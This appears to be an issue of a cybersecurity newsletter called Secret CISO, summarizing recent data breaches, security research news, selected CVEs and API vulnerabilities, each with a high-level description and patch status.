Good morning, Secret CISO readers! Today's newsletter is packed with crucial updates from the world of cybersecurity. We're diving into the latest data breaches, including the recent Equifax hack that led to stolen Social Security numbers. We'll also discuss the ongoing lawsuit against an Illinois-based golf course company over a previous data breach. In the corporate world, AT&T has agreed to a $13M settlement over a data breach, while Disney has decided to stop using Slack by the end of the year due to a massive data breach. We'll also touch on the best practices for ensuring security in software development, as suggested by Forbes.

On the legal front, Federman & Sherwood are investigating multiple companies for data breaches, including TradeZero America Inc. and Insurance Agency Marketing Services, Inc. We'll also look into the recent data breach at Providence Public School District and the launch of an online portal for data breach reporting by Pennsylvania's Attorney General. In the research sector, we have updates on collaborations between the UK, US, and Canada on cybersecurity research, and the selection of 2024-2025 Minerva-USIP Peace and Security Fellows by the Department of Defense.

Finally, we'll wrap up with the latest cybersecurity vulnerabilities and how they're being addressed. Stay tuned for all this and more in today's edition of Secret CISO. Stay safe and informed!

Data Breaches

1. Golf Course Co. Sued Again; Earlier Data Breach Case Axed: An Illinois-based golf course is facing another lawsuit following a previous data breach case. The details of the breach have not been disclosed. Source: Law360
2. Federman & Sherwood Investigates TradeZero America Inc. for Data Breach: TradeZero America Inc. is under investigation after a data breach that compromised individuals' names, Social Security numbers, driver's license numbers, and financial information. Source: Business Wire
3. AT&T Settles $13M FCC Investigation Over Data Breach: AT&T has agreed to a $13M settlement with the FCC following a data breach involving a vendor. The settlement includes the enforcement of new privacy measures and data security protocols. Source: The National Law Review
4. Providence school officials are quiet on data breach details: A ransomware group claims to have stolen 200 gigabytes of data from the Providence Public School District, but officials have yet to provide details on the breach. Source: Rhode Island Current
5. Disney ditches Slack after data breach, putting pressure on Salesforce to boost on security: Disney has decided to stop using Slack following a data breach that exposed over 44 million messages, 18,800 spreadsheets, and 13,000 PDF files. This puts pressure on Salesforce to enhance its security measures. Source: eMarketer

Security Research

1. Snowflake Hacker Still Active, Finding New Victims, Expert Says: A notorious hacker, known as the Snowflake Hacker, continues to target new victims despite his activities being widely publicized. The hacker has even boasted about his exploits to journalists and security researchers. Source: Yahoo Finance
2. Local security expert pens online safety guide with daughter to help parents: A security expert and his teenage daughter have written a guide on online safety and security, aiming to help parents navigate the digital world with their children. Source: NEWS10 ABC
3. macOS Sequoia's firewall disrupts security tools, and more: The new firewall in macOS Sequoia has been found to disrupt security tools. Security researcher Will Dormann reported having issues with the new feature. Source: MacDailyNews
4. UK, US and Canada to collaborate on cybersecurity research: The UK, US, and Canada are joining forces to enhance cybersecurity research in support of defense and security. The collaboration aims to strengthen the cybersecurity capabilities of the three nations. Source: Innovation News Network
5. Researcher reveals 'catastrophic' security flaw in the Arc browser: A security researcher has uncovered a severe vulnerability in the Arc browser. The flaw, described as "catastrophic," could have allowed attackers to insert arbitrary code. Source: The Verge

Top CVEs

1. CVE-2024-45793 - Confidant Cross Site Scripting Vulnerability: Confidant, an open-source secret management service, has been found to have a cross-site scripting vulnerability in several of its endpoints. Attackers, who need to be authenticated and have privileges to create new credentials, can exploit this vulnerability to show information and run scripts to other users within the same Confidant instance. This issue has been patched in version 6.6.2 and all users are advised to upgrade. Source: CVE-2024-45793
2. CVE-2024-47062 - Navidrome SQL Injection Vulnerability: Navidrome, an open-source web-based music collection server and streamer, has been found to have SQL Injection vulnerabilities. Attackers can exploit this to access information by adding parameters in the URL, leading to potential retrieval of arbitrary information and database content dumping. These vulnerabilities have been addressed in release version 0.53.0 and users are advised to upgrade. Source: CVE-2024-47062
3. CVE-2024-45489 - Arc Remote Code Execution Vulnerability: Arc, a software platform, has a vulnerability that allows remote code execution in JavaScript boosts. Due to misconfigured Firebase ACLs, it is possible to create or update a boost using another user's ID, which installs the boost in the victim's browser and runs arbitrary Javascript on that browser in a privileged context. Source: CVE-2024-45489
4. CVE-2024-41721 - USB Code Insufficient Boundary Validation: An insufficient boundary validation in the USB code could lead to an out-of-bounds read on the heap, which could potentially lead to an arbitrary write and remote code execution. Source: CVE-2024-41721
5. CVE-2018-20319 - Reserved for Future Use: This candidate has been reserved by an organization or individual for use when announcing a new security problem. Details will be publicized when the candidate has been used. Source: CVE-2018-20319

API Security

1. Versa Director API Vulnerability (CVE-2024-45229): Versa Director's REST APIs, designed for orchestration and management, have been found to be exploitable via a GET request injection, potentially exposing authentication tokens of logged-in users. These tokens can be used to invoke additional APIs on port 9183. No workarounds are currently available in Versa Director, but a Web Application Firewall (WAF) or API Gateway can be used to block access to the vulnerable API URLs. Versa recommends upgrading to a remediated software version. Source: CVE-2024-45229
2. Confidant API XSS Vulnerability: Potential Cross-Site Scripting (XSS) vulnerabilities have been found in several API calls in Confidant. The attacker needs to be authenticated and have privileges to create new credentials. The vulnerability can be used to show information and run scripts to other users in the same Confidant instance. The issue has been patched in version 6.6.2, and no workarounds are available. Source: GHSA-RXQ8-Q85F-M866
3. Navidrome SQL Injections and ORM Leak: Navidrome has been found to have multiple vulnerabilities, including SQL Injections and ORM Leak. Parameters added to the URL are automatically included in SQL queries, potentially allowing attackers to retrieve arbitrary information. Additionally, the parameter names are not properly escaped, leading to SQL Injections. A weakness in authentication also allows users to log in with "%" instead of their username. Source: GHSA-58VJ-CV5W-V4V6

Sponsored by Wallarm API Security Solution

Final Words

And that's a wrap for today's edition of Secret CISO. We hope these insights help you stay ahead of the curve in the ever-evolving landscape of data breaches and security threats. Remember, the first step to protection is awareness.

So, keep yourself informed and don't forget to share this newsletter with your friends and colleagues.

Let's work together to create a safer digital world. Stay safe and see you tomorrow!